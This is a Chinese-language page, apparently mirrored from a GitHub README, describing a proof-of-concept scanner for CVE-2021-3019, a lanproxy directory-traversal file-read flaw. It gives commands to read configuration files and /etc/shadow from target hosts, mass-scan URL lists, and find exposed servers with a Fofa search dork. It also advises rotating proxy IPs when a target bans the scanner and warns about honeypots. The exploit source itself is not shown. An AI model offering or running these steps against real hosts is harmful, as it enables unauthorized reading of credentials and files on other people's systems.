关联漏洞
描述
CVE-2021-3019 lanproxy目录遍历任意文件读取漏洞探测POC
介绍
# CVE-2021-3019
CVE-2021-3019 lanproxy目录遍历任意文件读取漏洞

## 使用方法
### 下载
```zsh
git clone https://github.com/FanqXu/CVE-2021-3019.git
cd CVE-2021-3019
```
### 帮助
默认不带参数运行显示帮助信息

### 单个URL
对单个URL进行漏洞检测,如果存在漏洞则默认读取配置文件并输出
```zsh
python3 POC.py -u http://127.0.0.1:9100
```

### 读取其他文件
使用`-r`参数读取系统其他文件,需要知道文件的绝对路径
```zsh
python3 POC.py -u http://127.0.0.1:9100 -r /etc/shadow
```

### 批量扫描
使用`-f`参数批量检测,有漏洞的将被写入`success.txt`文件
```zsh
python3 POC.py -f urls.txt
```

## 其他问题
### Fofa Dork
"Server: LPS-0.1" && title=="登录"
### IP被禁
当出现 `Connection reset by peer` 时,极大可能是被目标服务器禁了IP,切换个代理IP即可。
### 注意蜜罐
文件快照
[4.0K] /data/pocs/015298a346c50327f10ab6304fd8737c306a0acf
├── [4.0K] imgs
│ ├── [980K] files.png
│ ├── [780K] help.png
│ ├── [123K] payload.png
│ ├── [762K] readOtherFile.png
│ └── [735K] singeUrl.png
├── [4.6K] POC.py
└── [1.1K] README.md
1 directory, 7 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。